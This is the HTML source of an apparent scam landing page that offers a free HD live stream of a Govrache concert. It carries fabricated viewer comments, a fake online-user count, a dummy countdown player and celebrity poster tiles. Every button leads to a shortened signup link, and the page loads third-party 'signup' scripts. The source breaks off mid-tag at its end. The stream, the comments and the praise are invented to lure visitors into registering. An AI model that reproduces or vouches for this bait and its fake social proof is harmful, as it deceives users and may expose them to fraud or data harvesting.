<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<!--Robin -->
<head>

    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta name="description"
        content="LIVE OlLIVE there’s always great music to listen to, concert to watch, game to play or book to read. Browse amazing collection for every mood and genre. Perfect if you don't know what to listen to, or if you're in the mood for something new." />
    <meta name="keywords" content="LIVE" />
    <meta name="robots" content="index,follow,noodp" />
    <meta name="googlebot" content="index,follow" />
    <meta name="yahooBOT" content="index,follow" />
    <meta name="REVISIT-AFTER" content="1 DAYS" />
    <meta name="RATING" content="GENERAL" />
    <meta property="og:site_name" content="Concert Live Stream Online HD" />
    <meta property="og:type" content="Website" />
    <meta property="og:locale" content="en_EN" />
    <meta name="distribution" content="Global" />
    <meta name="author" content="twostar.html" />
    <meta name="abstract"
        content="Concert free, watch Concert, Concert online, Concert streaming, concert.twostar.xyz" />
    <meta name="classification" content="online Concert, Concert" />
    <meta name="Search Engines"
        content="www.altaVista.com, www.aol.com, www.infoseek.com, www.excite.com, www.hotbot.com, www.lycos.com, www.magellan.com, www.looksmart.com, www.cnet.com, www.voila.com, www.google.fr, www.google.com, www.google.com.vn, www.yahoo.fr, www.yahoo.com, www.alltheweb.com, www.msn.com, www.netscape.com, www.nomade.com" />
    <meta name="google-site-verification" content="V_BnHD0oNjov2d5qd8npdI-9rj3mCdOl1DlEZJDGaaQ" />
    <meta name="prVerify" content="b5e70fcec7a2d1802d05e654bda6d4b3" />
    <meta name="Language" content="english" />
    <meta name="msvalidate.01" content="92BCA97462F1636568FBD1666EB82A21" />
    <meta name="title" content="LIVE | CONCERT" />
    <meta property="og:title" content="LIVE | CONCERT" />
    <meta property="og:description"
        content="LIVELIVE there’s always great music to listen to, concert to watch, game to play or book to read. Browse amazing collection for every mood and genre. Perfect if you don't know what to listen to, or if you're in the mood for something new." />
    <meta property="og:keywords" content="LIVE" />
    <meta property="og:image" content="templates/v5/images/28c3ff8b4dd32ebcbe1ceabbceca7fbe.html" />
    <link rel="icon" type="image/png" href="templates/v5/images/favicon/favicon.png" />
    <link rel="Alternate" type="application/rss+xml" href="rss/index.html" />


    <link rel="stylesheet" href="http://fonts.googleapis.com/css?family=Open+Sans:400,600,700">
    <link type="text/css" rel="stylesheet" href="http://fonts.googleapis.com/css?family=Droid+Sans:400,700">
    <link rel="stylesheet" href="http://fonts.googleapis.com/css?family=Open+Sans">
    <link href="http://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet">
    <script src="../begin.tzarmedia.com/js/signup/movies/ce/modernizr.js"></script>
    <link href="style.css" rel="stylesheet">
    <script src="../ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <link href="../maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css" rel='stylesheet'
        type='text/css'>
    <script src="script.js"></script>
    <link href="http://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet">


    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css"
        integrity="sha384-TX8t27EcRE3e/ihU7zmQxVncDAy5uIKz4rEkgIXeMed4M0jlfIDPvg6uqKI2xXr2" crossorigin="anonymous">


    <link rel="stylesheet" href="templates/v5/css/font-awesome.min.css">
    <link rel="stylesheet" href="templates/v5/css/bootstrap.min.css" type="text/css" />
    <link rel="stylesheet" href="templates/v5/css/main.css" type="text/css" />
    <link rel="stylesheet" href="templates/v5/css/all.min.css" type="text/css" />
    <link rel="stylesheet" href="templates/v5/css/custom.css" type="text/css" />
    <link rel="stylesheet" href="templates/v5/css/player.html" type="text/css" />
    <link rel="stylesheet" href="newstyle.css">

    <link href="#" rel="canonical" />
    <link href="templates/v5/images/28c3ff8b4dd32ebcbe1ceabbceca7fbe.html" rel="image_src" />
    <script type="text/javascript">
        var HTTP_SERVER = 'index.html';
        var HTTP_THEME = '';
        var HTTP_PLAYER = 'http://play1.twostar.xyz/';
        if (top.location != window.location) {
            top.location = window.location
        }
    </script>


    <script type="text/javascript" src="templates/v5/js/jquery-1.9.1.min.js"></script>
    <script type="text/javascript" src="templates/v5/js/jquery.lazyload.js"></script>
    <script type="text/javascript" src="templates/v5/js/jquery.hover-intent.js"></script>
    <script type="text/javascript" src="templates/v5/js/jquery.cluetip.min.js"></script>
    <script type="text/javascript" src="templates/v5/js/jquery.qtip.min.js"></script>
    <script type="text/javascript" src="templates/v5/js/jquery.cookie.js"></script>
    <script type="text/javascript" src="templates/v5/js/modernizr.html"></script>


    <script
        type="application/ld+json"> { "@context": "http://schema.org", "@type": "WebSite", "url": "https://eventflix.net/", "potentialAction": { "@type": "SearchAction", "target": "http://concert.twostar.xyz/search/{search_term_string}", "query-input": "required name=search_term_string" } } </script>

    <title> Govrache - Sémaphore en chanson  </title>
</head>

<body>

    <div id="xmain">

        <!--header-->
        <header>
            <div class="container">

                <div class="header-logo">
                    <h1>
                        <a title="Eventflix" href="index.html" id="logo">EVENTFLIX</a>
                    </h1>
                </div>
                <div class="mobile-menu"><i class="glyphicon glyphicon-phone"></i></div>
                <div id="top-user"></div>
                <div class="clearfix"></div>
            </div>
        </header>

        <div id="main" class="page-detail">
            <div class="page-cover" style="background-image: url(templates/v5/images/head-bg/head-bg.jpg)"></div>
            <div class="container">
                <div class="shaha">
                    <div class="picture">
                        <img src="today/event.jpg" alt="Picture" />
                        <h2> <span style="color:rgb(163, 9, 9); background-color:aquamarine">Event Name: </span>Govrache - Sémaphore en chanson </h2>
                    </div>
                </div>
                <div class="pad"></div>
                <div class="main-content main-detail ">
                    <div class="md-top">
                        <div id="mv-info">
                            <div class="mvi-content">
                                <div class="body-cover">
                                    <div class="signup-pop">
                                        <p>Only registered users can comment and watch live streaming.</p>
                                        <a onclick="window.location.href='https://cutt.ly/wgHvgxr'" target="_self"
                                            class="">
                                            <div class="signup-button">Signup Now</div>
                                        </a>

                                    </div>
                                </div>
                                <div class="stage stage-bg--1">
                                    <div class="header-div row padding-bottom-small-0">
                                        <p><span class="logo-text"> </span></p>

                                    </div>
                                    <div class="row">
                                        <div class="video large-8 medium-12 columns">
                                            <div class="title-keyword" style="font-size:150%;">
                                                <span style="visibility: hidden;" id="lastDateBlinker"><a onclick="#"><i
                                                            class="fa fa-circle" style="color:red"></i></a></span>
                                                <script type="text/javascript">
                                                    function blinkLastDateSpan() {
                                                        if ($("#lastDateBlinker").css("visibility").toUpperCase() == "HIDDEN") {
                                                            $("#lastDateBlinker").css("visibility", "visible");
                                                            setTimeout(blinkLastDateSpan, 200);
                                                        } else {
                                                            $("#lastDateBlinker").css("visibility", "hidden");
                                                            setTimeout(blinkLastDateSpan, 200);
                                                        }
                                                    }
                                                    blinkLastDateSpan();
                                                </script>
                                                <span style="color: #fff;">LIVE </span><br>
                                            </div>
                                            <div style="display: none;"><iframe class="embed-responsive-item"
                                                    id="iframe"
                                                    src="http://www.youtube.com/embed/?rel=0&amp;modestbranding=1&amp;autoplay=1&amp;autohide=1&amp;showinfo=1&amp;controls=0"
                                                    onload="this.scrolling='no';this.allowfullscreen='true';"
                                                    style="overflow:hidden;border:0;" scrolling="no"></iframe></div>
                                            <div class="video-screen">
                                                <div style="display: none;" class="overlay-video"></div>
                                                <div style="display: none;" class="percent-container"></div>
                                                <div style="display: block;" class="popup-time">
                                                    <p>Begins in <span id="countdown">00:08</span></p>
                                                </div>
                                                <div style="" class="popup-container">

                                                    <div class="popup-text">
                                                        <br>Please Register Free Account to Access
                                                        <br>.
                                                        <br> <br>

                                                    </div>
                                                    <a href="#" data-toggle="modal" data-target="#pop-auth"
                                                        target="_self" class="clone">
                                                        <div class="popup-button">Register Now</div>
                                                    </a>

                                                </div>
                                            </div>
                                            <div class="controls">
                                                <div class="small-1 medium-1 large-1 no-col-hd-pad columns pause-play">
                                                    <i style="display: none;" class="icon-play"></i><a href="#"
                                                        target="_blank" class="clone"><i style="display: inline;"
                                                            class="icon-pause"></i></a></div>
                                                <div class="small-8 medium-7 large-9 columns">
                                                    <div class="time"></div>
                                                </div>
                                                <div
                                                    class="small-0 medium-0 large-1 columns no-col-left-pad show-for-large-up vol-wrapper">
                                                    <div class="small-0 medium-0 large-1 columns"><a href="#"
                                                            target="_blank" class="x-domain clone"><i
                                                                class="icon-vol"></i></a></div>
                                                </div><a href="#" target="_blank" class="x-domain fullscreen clone"><i
                                                        class="icon-fullscreen"></i></a>
                                            </div>
                                        </div>
                                        <div class="large-4 medium-12 columns">
                                            <div class="comments-wrapper" id="comment-box" style="margin-top: 22px;">
                                                <div class="comment-row">
                                                    <div class="username">donny23</div>
                                                    <div class="comment">HAHAHAHA</div>
                                                    <div class="comment-time">3m ago</div>
                                                    <div class="clear"></div>
                                                </div>
                                                <div class="comment-row">
                                                    <div class="username">ecrivin</div>
                                                    <div class="comment">Live Concert work on my telly , its Cool !!
                                                    </div>
                                                    <div class="comment-time">3m ago</div>
                                                    <div class="clear"></div>
                                                </div>
                                                <div class="comment-row">
                                                    <div class="username">knicks07</div>
                                                    <div class="comment">
                                                        <img src="templates/v5/images/favicon/laughing-emoji.png"
                                                            class="emoji">
                                                        <img src="templates/v5/images/favicon/laughing-emoji.png"
                                                            class="emoji">
                                                        <img src="templates/v5/images/favicon/laughing-emoji.png"
                                                            class="emoji">
                                                    </div>
                                                    <div class="comment-time">3m ago</div>
                                                    <div class="clear"></div>
                                                </div>
                                                <div class="comment-row">
                                                    <div class="username">ecrivin</div>
                                                    <div class="comment">Thank you very much - was lookin for for a
                                                        veery long time</div>
                                                    <div class="comment-time">3m ago</div>
                                                    <div class="clear"></div>
                                                </div>
                                                <div class="comment-row">
                                                    <div class="username">redwings19</div>
                                                    <div class="comment">10/10 WEBSITE , Fantastic Liblary !! would
                                                        recomended this to everyone. u kiding m <img
                                                            src="templates/v5/images/favicon/sunglasses-emoji.png"
                                                            class="emoji"></div>
                                                    <div class="comment-time">2m ago</div>
                                                    <div class="clear"></div>
                                                </div>
                                                <div class="comment-row">
                                                    <div class="username">juveee</div>
                                                    <div class="comment">Love that so many are available in HD <img
                                                            src="templates/v5/images/favicon/laughing-emoji.png"
                                                            class="emoji"></div>
                                                    <div class="comment-time">2m ago</div>
                                                    <div class="clear"></div>
                                                </div>
                                                <div class="comment-row">
                                                    <div class="username">viveleCH</div>
                                                    <div class="comment">no stream seem fine for me
                                                        <img src="templates/v5/images/favicon/hearteyes-emoji.png"
                                                            class="emoji">
                                                        <img src="templates/v5/images/favicon/hearteyes-emoji.png"
                                                            class="emoji">
                                                    </div>
                                                    <div class="comment-time">2m ago</div>
                                                    <div class="clear"></div>
                                                </div>
                                                <div class="comment-row">
                                                    <div class="username">greghaady</div>
                                                    <div class="comment">now !! yay </div>
                                                    <div class="comment-time">2m ago</div>
                                                    <div class="clear">
                                                    </div>
                                                </div>
                                                <div class="comment-row">
                                                    <div class="username">uh112</div>
                                                    <div class="comment">are ye to sab HD ha</div>
                                                    <div class="comment-time">2m ago</div>
                                                    <div class="clear">
                                                    </div>
                                                </div>
                                                <div style="display: block;" class="comment-row" id="comment-1">
                                                    <div class="username">alextheGr8</div>
                                                    <div class="comment">I AM GROOT!?</div>
                                                    <div class="comment-time">now
                                                    </div>
                                                    <div class="clear">
                                                    </div>
                                                </div>
                                                <div class="comment-row" id="comment-2">
                                                    <div class="username">bmarshall</div>
                                                    <div class="comment">Best Recorder ... im lucky . <img
                                                            src="templates/v5/images/favicon/laughing-emoji.png"
                                                            class="emoji"> u kidding me??<img
                                                            src="templates/v5/images/favicon/laughing-emoji.png"
                                                            class="emoji"><img
                                                            src="templates/v5/images/favicon/laughing-emoji.png"
                                                            class="emoji">
                                                    </div>
                                                    <div class="comment-time">now</div>
                                                    <div class="clear"></div>
                                                </div>
                                                <div class="comment-row" id="comment-3">
                                                    <div class="username">lvspeace</div>
                                                    <div class="comment">Have a great day! Yeah YOU, I'm talking to YOU!
                                                        <img src="templates/v5/images/favicon/laughing-emoji.png"
                                                            class="emoji"> <img
                                                            src="templates/v5/images/favicon/laughing-emoji.png"
                                                            class="emoji"> <img
                                                            src="templates/v5/images/favicon/laughing-emoji.png"
                                                            class="emoji"></div>
                                                    <div class="comment-time">now</div>
                                                    <div class="clear"></div>
                                                </div>
                                                <div class="comment-row" id="comment-4">
                                                    <div class="username">TB12fan</div>
                                                    <div class="comment"> Save your money, guuys <img
                                                            src="templates/v5/images/favicon/laughing-emoji.png"
                                                            class="emoji"></div>
                                                    <div class="comment-time">now</div>
                                                    <div class="clear"></div>
                                                </div>
                                                <div class="comment-row" id="comment-5">
                                                    <div class="username">jennyb</div>
                                                    <div class="comment">@greghaady no stream seems fine for me :)</div>
                                                    <div class="comment-time">now</div>
                                                    <div class="clear"></div>
                                                </div>

                                                <div class="comment-row" id="comment-6">
                                                    <div class="username">jaecrowder</div>
                                                    <div class="comment">This is what I wait wait , can finally live
                                                        streaming with good quality and without HD video <img
                                                            src="templates/v5/images/favicon/wink-emoji.png"
                                                            class="emoji"></div>
                                                    <div class="comment-time">now</div>
                                                    <div class="clear"></div>
                                                </div>

                                                <div class="comment-row" id="comment-7">
                                                    <div class="username">marvinj</div>
                                                    <div class="comment">Awesome work bro! Loving this live streaming ,
                                                        No Lag </div>
                                                    <div class="comment-time">now</div>
                                                    <div class="clear"></div>
                                                </div>
                                            </div>
                                            <div class="fullcomment-wrapper">
                                                <input placeholder="Write a comment..." class="write-comment"
                                                    type="text">
                                                <img src="templates/v5/images/favicon/default-emoji.png"
                                                    class="default-emoji">
                                            </div>
                                            <div class="powered" style="font-size: 16px;">Only registered users can
                                                comment and watch live streaming.</div>
                                        </div>
                                    </div>




                                    <div class="bwa-content">


                                    </div>
                                </div>
                                <div class="mvic-desc">

                                    <h3>
                                        Live Concert
                                    </h3>
                                    <div class="mv-rating" itemtype="http://data-vocabulary.org/Review-aggregate"
                                        itemscope="">
                                    </div>
                                    <div class="block-social">
                                        <!-- Go to www.addthis.com/dashboard to customize your tools -->
                                        <div class="addthis_native_toolbox"></div>
                                    </div>

                                    <div class="mvic-info">
                                        <div class="mvici-left">
                                            <p>
                                                <strong>TAG: </strong> <a href="#/Concert" data-toggle="modal"
                                                    data-target="#pop-auth">Concert</a>, <a href="#/Live"
                                                    data-toggle="modal" data-target="#pop-auth">Live</a>, <a
                                                    href="#/Festival" data-toggle="modal"
                                                    data-target="#pop-auth">Festival</a>, <a href="#/Tour"
                                                    data-toggle="modal" data-target="#pop-auth">Tour</a>, <a
                                                    href="#/Artist" data-toggle="modal"
                                                    data-target="#pop-auth">Artist</a>, <a href="#/Song"
                                                    data-toggle="modal" data-target="#pop-auth">Song</a>, <a
                                                    href="#/Music" data-toggle="modal"
                                                    data-target="#pop-auth">Music</a>, <a href="#/Live-Stream"
                                                    data-toggle="modal" data-target="#pop-auth">Live Stream</a>, <a
                                                    href="#/2017" data-toggle="modal" data-target="#pop-auth">2017</a>
                                            </p>
                                            <p>



                                            </p>
                                        </div>
                                        <div class="mvici-right">
                                            <p>
                                                <strong>Artist: </strong>
                                                Concert
                                            </p>
                                            <p>
                                                <strong>Quality:</strong><span class="quality">HD</span>
                                            </p>
                                            <p>


                                            </p>

                                        </div>
                                        <div class="clearfix"></div>
                                    </div>

                                    <div class="desc">
                                        <hr>
                                        - You need to create an account to gain permission to access unlimited downloads
                                        & streaming.<br>
                                        - Take advantage of our special promotional offer to gain unlimited access for 5
                                        days for free.
                                    </div>



                                    <div class="clearfix"></div>
                                    <!-- keywords -->
                                </div>
                                <div class="clearfix"></div>

                            </div>
                        </div>
                        <div class="row thumbs" style="margin-top:10px;"></div>
                    </div>
                </div>
                <script type="text/javascript">
                    $(function () {
                        $('a[data-toggle="tooltip"]').tooltip({
                            html: true
                        });
                    });
                </script>

                <style>
                    .tooltip.in {
                        opacity: 1;
                        filter: alpha(opacity=100);
                    }

                    .tooltip {
                        z-index: 9999 !important;
                    }
                </style>
                <div class="movies-list-wrap mlw-latestmovie">
                    <div class="ml-title">
                        <span class="pull-left">Concert Related</span>
                        <a href="#" data-toggle="modal" data-target="#pop-auth" class="pull-right cat-more">View more
                            »</a>

                        <div class="clearfix">
                        </div>
                    </div>
                    <div class="tab-content">
                        <div id="top-hot" class="movies-list movies-list-full tab-pane in fade active">

                            <div class="ml-item">
                                <a href="#" data-toggle="modal" data-target="#pop-auth" class="ml-mask"
                                    title="Red Hot Chili Paper" data-url="tooltip/1255">
                                    <span class="mli-quality">HD</span>
                                    <img class="thumb mli-thumb lazy" title="Red Hot Chili Paper"
                                        alt="Red Hot Chili Paper"
                                        data-original="templates/v5/images/poster/poster (1).jpg">
                                    <span class="mli-info">
                                        <div class="mli-title">
                                            <h2>Red Hot Chili Paper</h2>
                                        </div>
                                    </span>
                                </a>
                            </div>
                            <div class="ml-item">
                                <a href="#" data-toggle="modal" data-target="#pop-auth" class="ml-mask"
                                    title="Avenged Sevenfold" data-url="tooltip/293">
                                    <span class="mli-quality">HD</span>
                                    <img class="thumb mli-thumb lazy" title="Avenged Sevenfold" alt="Avenged Sevenfold"
                                        data-original="templates/v5/images/poster/poster (2).jpg">
                                    <span class="mli-info">
                                        <div class="mli-title">
                                            <h2>Avenged Sevenfold</h2>
                                        </div>
                                    </span>
                                </a>
                            </div>
                            <div class="ml-item">
                                <a href="#" data-toggle="modal" data-target="#pop-auth" class="ml-mask" title="Drake"
                                    data-url="tooltip/1254">
                                    <span class="mli-quality">HD</span>
                                    <img class="thumb mli-thumb lazy" title="Drake" alt="Drake"
                                        data-original="templates/v5/images/poster/poster (3).jpg">
                                    <span class="mli-info">
                                        <div class="mli-title">
                                            <h2>Drake</h2>
                                        </div>
                                    </span>
                                </a>
                            </div>
                            <div class="ml-item">
                                <a href="#" data-toggle="modal" data-target="#pop-auth" class="ml-mask" title="Adele"
                                    data-url="tooltip/1172">
                                    <span class="mli-quality">HD</span>
                                    <img class="thumb mli-thumb lazy" title="Adele" alt="Adele"
                                        data-original="templates/v5/images/poster/poster (4).jpg">
                                    <span class="mli-info">
                                        <div class="mli-title">
                                            <h2>Adele</h2>
                                        </div>
                                    </span>
                                </a>
                            </div>
                            <div class="ml-item">
                                <a href="#" data-toggle="modal" data-target="#pop-auth" class="ml-mask"
                                    title="Bryan Adams" data-url="tooltip/1227">
                                    <span class="mli-quality">HD</span>
                                    <img class="thumb mli-thumb lazy" title="Bryan Adams" alt="Bryan Adams"
                                        data-original="templates/v5/images/poster/poster (5).jpg">
                                    <span class="mli-info">
                                        <div class="mli-title">
                                            <h2>Bryan Adams</h2>
                                        </div>
                                    </span>
                                </a>
                            </div>
                            <div class="ml-item">
                                <a href="#" data-toggle="modal" data-target="#pop-auth" class="ml-mask" title="Skrillex"
                                    data-url="tooltip/2134">
                                    <span class="mli-quality">HD</span>
                                    <img class="thumb mli-thumb lazy" title="Skrillex" alt="Skrillex"
                                        data-original="templates/v5/images/poster/poster (6).jpg">
                                    <span class="mli-info">
                                        <div class="mli-title">
                                            <h2>Skrillex</h2>
                                        </div>
                                    </span>
                                </a>
                            </div>
                            <div class="ml-item">
                                <a href="#" data-toggle="modal" data-target="#pop-auth" class="ml-mask" title="Beyonce"
                                    data-url="tooltip/1253">
                                    <span class="mli-quality">HD</span>
                                    <img class="thumb mli-thumb lazy" title="Beyonce" alt="Beyonce"
                                        data-original="templates/v5/images/poster/poster (7).jpg">
                                    <span class="mli-info">
                                        <div class="mli-title">
                                            <h2>Beyonce</h2>
                                        </div>
                                    </span>
                                </a>
                            </div>
                            <div class="ml-item">
                                <a href="#" data-toggle="modal" data-target="#pop-auth" class="ml-mask" title="Coldplay"
                                    data-url="tooltip/1884">
                                    <span class="mli-quality">HD</span>
                                    <img class="thumb mli-thumb lazy" title="Coldplay" alt="Coldplay"
                                        data-original="templates/v5/images/poster/poster (8).jpg">
                                    <span class="mli-info">
                                        <div class="mli-title">
                                            <h2>Coldplay</h2>
                                        </div>
                                    </span>
                                </a>
                            </div>
                            <div class="ml-item">
                                <a href="#" data-toggle="modal" data-target="#pop-auth" class="ml-mask" title="Maroon 5"
                                    data-url="tooltip/1233">
                                    <span class="mli-quality">HD</span>
                                    <img class="thumb mli-thumb lazy" title="Maroon 5" alt="Maroon 5"
                                        data-original="templates/v5/images/poster/poster (9).jpg">
                                    <span class="mli-info">
                                        <div class="mli-title">
                                            <h2>Maroon 5</h2>
                                        </div>
                                    </span>
                                </a>
                            </div>
                            <div class="ml-item">
                                <a href="#" data-toggle="modal" data-target="#pop-auth" class="ml-mask"
                                    title="Twenty One Pilots" data-url="tooltip/1793">
                                    <span class="mli-quality">HD</span>
                                    <img class="thumb mli-thumb lazy" title="Twenty One Pilots" alt="Twenty One Pilots"
                                        data-original="templates/v5/images/poster/poster (10).jpg">
                                    <span class="mli-info">
                                        <div class="mli-title">
                                            <h2>Twenty One Pilots</h2>
                                        </div>
                                    </span>
                                </a>
                            </div>
                            <div class="ml-item">
                                <a href="#" data-toggle="modal" data-target="#pop-auth" class="ml-mask"
                                    title="Ariana Grande" data-url="tooltip/1541">
                                    <span class="mli-quality">HD</span>
                                    <img class="thumb mli-thumb lazy" title="Ariana Grande" alt="Ariana Grande"
                                        data-original="templates/v5/images/poster/poster (11).jpg">
                                    <span class="mli-info">
                                        <div class="mli-title">
                                            <h2>Ariana Grande</h2>
                                        </div>
                                    </span>
                                </a>
                            </div>
                            <div class="ml-item">
                                <a href="#" data-toggle="modal" data-target="#pop-auth" class="ml-mask"
                                    title="The Chainsmokers" data-url="tooltip/2045">
                                    <span class="mli-quality">HD</span>
                                    <img class="thumb mli-thumb lazy" title="The Chainsmokers" alt="The Chainsmokers"
                                        data-original="templates/v5/images/poster/poster (12).jpg">
                                    <span class="mli-info">
                                        <div class="mli-title">
                                            <h2>The Chainsmokers</h2>
                                        </div>
                                    </span>
                                </a>
                            </div>
                            <div class="ml-item">
                                <a href="#" data-toggle="modal" data-target="#pop-auth" class="ml-mask"
                                    title="John Legend" data-url="tooltip/518">
                                    <span class="mli-quality">HD</span>
                                    <img class="thumb mli-thumb lazy" title="John Legend" alt="John Legend"
                                        data-original="templates/v5/images/poster/poster (13).jpg">
                                    <span class="mli-info">
                                        <div class="mli-title">
                                            <h2>John Legend</h2>
                                        </div>
                                    </span>
                                </a>
                            </div>
                            <div class="ml-item">
                                <a href="#" data-toggle="modal" data-target="#pop-auth" class="ml-mask"
                                    title="Justin Bieber" data-url="tooltip/1394">
                                    <span class="mli-quality">SD</span>
                                    <img class="thumb mli-thumb lazy" title="Justin Bieber" alt="Justin Bieber"
                                        data-original="templates/v5/images/poster/poster (14).jpg">
                                    <span class="mli-info">
                                        <div class="mli-title">
                                            <h2>Justin Bieber</h2>
                                        </div>
                                    </span>
                                </a>
                            </div>
                            <div class="ml-item">
                                <a href="#" data-toggle="modal" data-target="#pop-auth" class="ml-mask"
                                    title="Metallica" data-url="tooltip/1938">
                                    <span class="mli-quality">HD</span>
                                    <img class="thumb mli-thumb lazy" title="Metallica" alt="Metallica"
                                        data-original="templates/v5/images/poster/poster (15).jpg">
                                    <span class="mli-info">
                                        <div class="mli-title">
                                            <h2>Metallica</h2>
                                        </div>
                                    </span>
                                </a>
                            </div>
                            <div class="ml-item">
                                <a href="#" data-toggle="modal" data-target="#pop-auth" class="ml-mask"
                                    title="Bruno Mars" data-url="tooltip/771">
                                    <span class="mli-quality">HD</span>
                                    <img class="thumb mli-thumb lazy" title="Bruno Mars" alt="Bruno Mars"
                                        data-original="templates/v5/images/poster/poster (16).jpg">
                                    <span class="mli-info">
                                        <div class="mli-title">
                                            <h2>Bruno Mars</h2>
                                        </div>
                                    </span>
                                </a>
                            </div>

                            <script type="text/javascript">
                                $("img.lazy").lazyload({
                                    effect: "fadeIn"
                                });
                            </script>
                            <div class="clearfix">
                            </div>
                        </div>
                        <div id="top-view" class="movies-list movies-list-full tab-pane in fade">
                        </div>
                        <div id="top-favorite" class="movies-list movies-list-full tab-pane in fade">
                        </div>
                        <div id="top-rating" class="movies-list movies-list-full tab-pane in fade">
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>



    <center>
        <div id="appnextiframe"> </div>
        <script type="text/javascript">
            var Appnext = {
                parent_url: window.location.origin,
                android_id: '55efb760-6fa1-4712-ba80-2a88a4a83b32',
                ios_id: '8f2f677f-60f9-494d-82b7-7d5e34122510',
                cnt: '',
                pbk: '',
                mute: '',
                creative: '',
                subid: '',
                b_title: '',
                b_color: '',
                title: '',
                ad_server: ''
            };
            (function () {
                var _s = document.createElement('script');
                _s.type = 'text/javascript';
                _s.async = true;
                _s.src = '../appnext.hs.llnwd.net/tools/tags/widget/m.js';

                (document.body) ? document.body.appendChild(_s) : document.head.appendChild(_s);
            })();
        </script>
    </center>
    <!--footer-->
    <footer>
        <div id="footer">
            <div class="wauto" style="width:1250px;margin: 0 auto;">


            </div>
            <div class="container">


                <div id="copyright">

                    <p>Copyright &copy; <a href="http:///" title=""></a>. All Rights
                        Reserved</p>
                    <p style="font-size: 11px; line-height: 14px;">All clips are collected from outside sources. No
                        videos are hosted on this server. is not liable for copyright by any country.
                        The Team is always updating and adding more concert live stream every day. It's all here.
                        Best view with Internet Explorer 7+/FireFox/Google Chrome, Flash Player, 4K.
                        <b>Concert Free</b>, <b>Concert Streaming</b>, <b>Concert Festival</b>, <b>Concert Tour</b>,
                        <b>Concert Online</b>
                    </p>
                </div>
                <div id="footer-social">
                    <a href="#" class="fs-icon fs-facebook"><i class="fa fa-facebook"></i></a>
                    <a href="#" class="fs-icon fs-twitter"><i class="fa fa-twitter"></i></a>
                    <a href="#" class="fs-icon fs-google"><i class="fa fa-google-plus"></i></a>
                </div>
                <div id="footer-menu">
                    <a href="http:///terms" title="Privacy Policy"></a>

                </div>
            </div>
        </div>
    </footer>
    <!--/footer-->
    </div>
    <div class="clearfix"></div>
    <div id="auth-modal">
        <!-- Modal -->
        <div class="modal fade modal-cuz" id="pop-auth" tabindex="-1" role="dialog" aria-labelledby="myModalLabel"
            aria-hidden="true">
            <div class="modal-dialog">
                <div class="modal-tabs">
                    <ul id="md-list" class="nav nav-tabs" role="tablist">
                        <li class="active"><a id="tab-register" href="#modal-register" role="tab" data-toggle="tab"><i
                                    class="glyphicon glyphicon-pencil"></i><strong>Register</strong></a></li>


                        <li class="pull-right"><a class="close" data-dismiss="modal" aria-label="Close"><i
                                    class="glyphicon glyphicon-remove"></i></a></li>
                    </ul>
                </div>
                <div class="modal-content tab-content">
                    <div id="modal-login" class="tab-pane in fade active">
                        <div class="modal-body">
                            <!--                        <div class="cuz-login-social">-->
                            <!--                            <p class="desc text-center">Log in with your Facebook account.</p>-->
                            <!--                            <div class="cls-list mt10">-->
                            <!--                                <a href="-->
                            <!--"-->
                            <!--                                   class="btn btn-block btn-facebook"><i-->
                            <!--                                        class="fa fa-facebook-square mr10"></i>Facebook</a>-->
                            <!--                                <a href="-->
                            <!--"-->
                            <!--                                   class="btn btn-block btn-google"><i class="fa fa-google-plus-square mr10"></i>Google+</a>-->
                            <!--                                <div class="clearfix"></div>-->
                            <!--                            </div>-->
                            <!--                        </div>-->
                            <!--                        <p class="desc text-center mb10">- Or use your Yesmovies account.</p>-->

                            <div id="modal-register" class="tab-pane in fade">
                                <div class="modal-body">
                                    <p class="desc">When becoming members of the site, you could use the full range of
                                        functions and
                                        enjoy the most exciting concert.</p>
                                    <form id="register-form" method="post">
                                        <a href="https://cutt.ly/wgHvgxr"
                                            class="btn btn-block btn-success btn-approve mt20">Free Registration</a>
                                    </form>
                                </div>

                            </div>

                        </div>
                    </div>
                </div>
            </div>
            <!--/ modal -->
        </div>

        <div class="online">

            <div class="online-icon"></div>
            <br>




            1958 Users Online Now<br>


        </div>



        <script type="text/javascript" src="templates/v5/js/bootstrap.min.js"></script>
        <script type="text/javascript" src="templates/v5/js/bootstrap-select.js"></script>
        <script type="text/javascript" src="templates/v5/js/psbar.jquery.min.js"></script>
        <script type="text/javascript" src="templates/v5/js/jquery.smooth-scroll.min.js"></script>
        <script type="text/javascript" src="templates/v5/js/md5.min.js"></script>
        <script type="text/javascript" src="templates/v5/js/yesmovies.v2.min7e0c.js?v=0.1"></script>
        <script type="text/javascript" src="templates/v5/js/slide.min.js"></script>


        <!-- Go to www.addthis.com/dashboard to customize your tools -->
        <script type="text/javascript" src="../s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5181dc394703fed7"
            async="async"></script>
        <script type="text/javascript">
            initQtip();







        </script>
        <img id="whosamung" src="http://whos.amung.us/swidget/jav163com1" width="0" height="0" border="0"
            title="User Online" alt="User Online" />


        <script src="http://begin.tzarmedia.com/js/signup/movies/ce/main.php?cache_control=&amp;lng=EN"></script>

        <script
